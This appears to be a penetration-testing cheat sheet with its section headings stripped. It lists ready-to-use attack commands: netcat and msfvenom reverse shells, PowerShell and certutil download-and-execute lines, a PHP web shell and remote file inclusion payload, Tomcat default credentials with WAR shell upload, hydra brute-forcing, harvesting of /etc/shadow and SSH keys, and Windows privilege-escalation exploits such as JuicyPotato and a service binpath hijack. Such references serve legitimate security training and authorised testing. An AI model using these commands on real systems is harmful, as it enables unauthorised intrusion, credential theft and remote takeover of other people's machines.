Python HTTP Server: python -m SimpleHTTPServer [PORT] (Python 3: python3 -m http.server [PORT])
Python FTP Server: python -m pyftpdlib -p 21
Linux Listener: nc -lnvp [PORT]
Windows Listener: nc.exe -lnvcp [PORT]
Searching for Exploits/Vulnerabilities: searchsploit [APPLICATION]
Downloading Exploits From searchsploit searchsploit -x [EXPLOIT_CODE] > [EXPLOIT.EXTENSION]
curl [URL] -o [FILENAME]
curl -X PUT http://[IP]/[FILE] -d @[FILE] -v
wget [URL]
powershell Invoke-RestMethod -Uri '[URL]' -OutFile '[PATH\TO\FILE]'
powershell IEX(New-Object Net.WebClient).DownloadString('[URL]')
PowerShell 2: powershell (New-Object Net.WebClient).DownloadFile('[URL]', '[PATH\TO\FILE]')
Download: nc -lnvp [PORT] > [OUT_FILE]
Upload: nc -nv [IP] [PORT] < [IN_FILE]
Linux: nc -nv [IP] [PORT] -e /bin/bash
Windows: nc.exe -nv [IP] [PORT] -e cmd.exe
Establish the SMB Share on Your Local Machine: sudo impacket-smbserver share .
Download (Local Machine -> Target Machine): copy \\[LOCAL_IP]\share\[FILE] [C:\OUTPUT\LOCATION]
Upload (Target Machine -> Local Machine): copy [FILE] \\[LOCAL_IP]\share\[FILE]
Download: certutil -urlcache -f http://[LOCAL_IP]/[FILE] [C:\OUTPUT\LOCATION] (https:// also works)
PayloadsAllTheThings Reverse Shells
Follow steps found here
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=screen
Background the shell with Ctrl+Z
stty raw -echo
Foreground the shell with fg
Hit Return 2x
-A: Aggressive scan (OS fingerprinting, version detection, default scripts, traceroute)
-O: OS Detection
-sV: Service Version/Enumeration
-sC: Enables Default (Safe) Scripts
-Pn: Skips Host Discovery (No Ping)
-sS: Stealth Scan / SYN Scan
-sU: UDP Scan
-v/-vv/-vvv: Varying Levels of Verbosity
-T[1-5]: Speed of Scan (5 Being the Fastest)
-p [PORT(S)]: Specify a Port, or Provide a Comma-Separated List of Ports
-p-: Full Port Scan (All 65535 Ports)
nmap -v -sS -sC -sV -T4 -Pn -oA nmap/[filename.tcp] -p- [IP]
nmap -sU -v -sC -sV -T4 -Pn -oA nmap/[filename.udp] [IP]
dnsenum [DOMAIN]
dnsrecon -d [DOMAIN]
dnsrecon -d [DOMAIN] -a
nmap -p 139,445 -Pn --script=smb-vuln* [IP]
smbclient -L //[IP]/
enum4linux -a [IP]
smbmap -H [IP]
./smbver.sh [IP]
Found Here
Logging into SMB Share
smbclient //[IP]/[SHARE]
Downloading all files from a directory
smbclient //[IP]/[SHARE] -U [USER] -c "prompt OFF;recurse ON;mget *"
snmpwalk -c [COMMUNITY_STRING] -v[SNMP_VERSION] [IP]
onesixtyone -c [COMMUNITY_STRING] -i [IPS]
snmp-check [IP]
System Processes: 1.3.6.1.2.1.25.1.6.0
Running Programs: 1.3.6.1.2.1.25.4.2.1.2
Processes Path: 1.3.6.1.2.1.25.4.2.1.4
Storage Units: 1.3.6.1.2.1.25.2.3.1.4
Software Name: 1.3.6.1.2.1.25.6.3.1.2
User Accounts: 1.3.6.1.4.1.77.1.2.25
TCP Local Ports: 1.3.6.1.2.1.6.13.1.3
snmpwalk -c [COMMUNITY_STRING] -v[SNMP_VERSION] [IP] [MIB_VALUE]
dirb [URL]
nikto -h [URL]
cewl [URL]
hydra -l/-L [USERNAME/USER_LIST] -P [PASSWORDLIST] [IP] http-form-post "[ENDPOINT]:[POST_PARAMETERS]&User=^USER^&Password=^PASS^:[FAILED_LOGIN_ERROR]"
wpscan --rua -e --url [URL]
wpscan --rua --url [URL] -P [PASSWORDS_LIST] -U "[USER],[USER]"
admin:admin
tomcat:tomcat
admin:[NOTHING]
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
wget 'http://[USER]:[password]@[IP]:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
curl -v -u [USER]:[PASSWORD] -T shell.war 'http://[IP]:8080/manager/text/deploy?path=/shell&update=true'
http://[VULN_IP]/[VULN_PAGE]?[VULN_PARAMETER]=../../../../[PATH/TO/LOCAL/FILE]
Linux: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
Windows: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
Both: /home/pharo/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
<?php echo shell_exec($_GET['cmd']); ?>
Store this in a file on the local host, point the vulnerable parameter at it via the web app, and pass commands through the cmd parameter.
http://[VULN_IP]/[VULN_PAGE]?[VULN_PARAMETER]=http://[LOCAL_IP]/rfi.txt&cmd=[COMMAND]
hydra -V -f -L [USER_LIST] -P [PASSWORDS_LIST] ftp://[IP] -u -vV
ftp [IP]
>PASSIVE
>BINARY
>get [FILE]
ftp [IP]
>PASSIVE
>BINARY
>put [FILE]
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
Use exploit found here
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe -o shell.exe
Change the USERNAME = '' line to USERNAME = '//'
Uncomment the smb_send_file(...) and the service_exe(...) calls
Modify them to upload and execute the payload file
Use listener
nc -lnvp [PORT]
Use exploit found here
Both Nishang and Empire have a suite of PowerShell tools.
Use the Empire Invoke-MS16-032.ps1
Use Nishang's Invoke-PowerShellTcp.ps1 for reverse shell payload.
Add the following line to the bottom of the Invoke-PowerShellTcp.ps1 script:
Invoke-PowerShellTcp -Reverse -IPAddress [LOCAL_IP] -Port [PORT]
Add the following to the bottom of the Invoke-MS16-032 script:
Invoke-MS16-032 -Command "IEX(New-Object Net.WebClient).DownloadString('[URL]/[REVERSESHELL_PAYLOAD]')"
Execute on the host by running the following:
powershell IEX(New-Object Net.WebClient).DownloadString('[URL]/Invoke-MS16-032.ps1')
Windows x86: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows -o shell.c
Windows x64: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x64 --platform windows -o shell.c
Replace the shellcode in the script with the generated output
Execute the script:
python ms08_067_2018.py [IP] [OS_OPTION] [PORT]
Use listener
nc -lnvp [PORT]
- (r)ead = Read permission only allows the user to read the content.
- e(x)ecute = The user has permission to execute the program.
- (w)rite = The user can modify or delete the file/program.
- (s)SUID = The file executes with the privileges of its owner (for example root).
- (s)SGID = The file executes with the privileges of its group.
Get kernel information: uname -a
Get Host information: hostname
Get current IP address: ip add
Current User: whoami
List Users Bash Access: cat /etc/passwd | grep bash
List User Groups: cat /etc/group
Check Access to Restricted Files: cat /etc/shadow
Check History Files: cat ~/.bash_history
Search for Files Related to Passwords: locate password | more
Search for Authorized SSH Keys: find / -name authorized_keys 2> /dev/null
Search for SSH Keys: find / -name id_rsa 2> /dev/null
List Installed Software: dpkg -l
Detailed Info on Software: dpkg -l | grep [SOFTWARE_NAME]
Current User: ps aux | grep [USER]
Root User: ps aux | grep root
crontab -l
- /etc/cron*
- /etc/init.d
- /etc/crontab
- /etc/cron.allow
- /etc/cron.d
- /etc/cron.daily
- /etc/cron.hourly
- /etc/cron.monthly
- /etc/cron.weekly
- /var/spool/cron
- /var/spool/cron/crontabs
LinPEAS.sh
Found here
LinEnum.sh
Found here
linux-exploit-suggestor
Found here
SharUp.exe
Found here
Sherlock.ps1
Found here
WinPEAS.exe
Found here
Found here (pre-compiled binaries)
For Windows 7 SP1 x86 Build 7601 use the source code here. This will need to be compiled in Visual Studio 2017.
- Windows 7 Enterprise
- Windows 8.1 Enterprise
- Windows 10 Enterprise
- Windows 10 Professional
- Windows Server 2008 R2 Enterprise
- Windows Server 2012 Datacenter
- Windows Server 2016 Standard
SeImpersonate
SeAssignPrimaryToken
Windows x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LOCAL-IP] LPORT=[PORT] -f exe -o shell.exe
Windows x86: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL-IP] LPORT=[PORT] -f exe -o shell.exe
Create the listener to catch the payload
nc -lnvp [PORT]
Run the exploit on the target host.
JuicyPotato.exe -l 1337 -p [DIR\TO\PAYLOAD] -t * -c {CLSID}
Upload accesschk.exe and nc.exe to the target host.
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
Running the following gives more information about the specified service (i.e. what groups have what permissions over it).
accesschk.exe /accepteula -ucqv [SERVICE]
To see the start type, dependencies, and binary path the service uses:
sc qc [SERVICE]
Check the status of the service.
sc query [SERVICE]
If needed, change the start type of the service:
sc config [SERVICE] start= auto
Changing the binary path (quote the whole command so sc stores it as one value):
sc config [SERVICE] binpath= "[PATH\TO\nc.exe] [KALI_IP] [PORT] -e C:\WINDOWS\System32\cmd.exe"
Set up the netcat listener and start the service.
Starting / Stopping the Service
net start [SERVICE]
net stop [SERVICE]
Exploit can be found here (pre-compiled)
- Windows 10
- Windows Server 2016
- Windows Server 2019
SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd
- MS16-014: applies to Windows 7 SP1 x86
- MS16-016: 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601)
- MS16-032: Applies to Windows 7 x86/x64, Windows 8 x86/x64, Windows 10, Windows Server 2008-2012 R2
- CVE-2020-0796: applies to Windows operating systems with SMBv3 enabled
- MS16-075
- CVE-2019-1388
msfvenom -p linux/x86/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f elf > shell.elf
Windows x86: msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe > shell.exe
Windows x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f exe > shell.exe
msfvenom -p php/reverse_php LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.php
Add the <?php opening tag to the top of shell.php (the raw output does not include it)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f war > shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f asp > shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=[LOCAL_IP] LPORT=[PORT] -f aspx-exe > shell.aspx
msfvenom -p cmd/unix/reverse_python LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=[LOCAL_IP] LPORT=[PORT] -f raw > shell.pl